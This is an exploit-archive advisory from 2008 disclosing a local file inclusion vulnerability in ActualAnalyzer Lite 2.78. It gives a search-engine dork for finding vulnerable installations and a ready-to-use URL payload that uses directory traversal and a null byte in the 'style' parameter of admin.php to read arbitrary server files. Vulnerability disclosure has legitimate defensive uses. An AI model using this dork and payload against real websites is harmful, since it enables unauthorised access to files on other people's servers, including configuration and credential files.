id: 2944
date: 04/30/2008
title: ActualAnalyzer Lite (free) 2.78 Local File Inclusion Vulnerability
author: IRCRASH
cves: 

==================================================================
ActualAnalyzer Lite (free) 2.78 Local File Inclusion Vulnerability
==================================================================



#####################################################################################
####                 ActualAnalyzer Lite (free) 2.78                             ####
####                    LOCAL FILE INCLUSION                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani)                                 #
#Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)                          #
#IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de   #
#####################################################################################
#                                                                                   #
#Script Download : http://actualscripts.com                                         #
#                                                                                   #
#DORK : "ActualAnalyzer Lite (free) 2.78"+"Copyright © 2006 ActualScripts"          #
#                                                                                   #
#####################################################################################
#                                   < LFI >                                         #
#LFI Address : http://Example/other/lite/admin.php?style=../../[FILE NAME]%00&language=ircrash
#                                                                                   #
#####################################################################################


#  0day.today [2023-03-24]  #